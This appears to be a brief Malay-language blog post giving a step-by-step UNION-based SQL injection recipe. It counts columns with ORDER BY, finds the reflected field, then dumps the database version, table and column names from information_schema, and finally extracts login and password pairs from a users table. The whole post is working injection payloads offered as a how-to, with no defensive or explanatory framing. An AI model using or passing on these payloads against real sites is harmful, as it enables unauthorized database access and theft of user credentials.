1) nak tentukan bilangan field
order by 6-- >> masih kluar normal page
order by 7-- >> page dah tak normal
2) nak tahu field yang berkenaan
union select 1,2,3,4,5,6-- >> akan kluar '5'
3) nak dapat version
union select 1,2,3,4,version(),6--
4) dapatkan senarai table
union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=[databasename]
5) dapatkan senarai nama field
union select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name=[tablename]
6) dapatkan maklumat tertentu
union select 1,2,3,4,concat_ws(0x3a,login,password),6 from users
output>> login.password
No comments:
Post a Comment
Terima kasih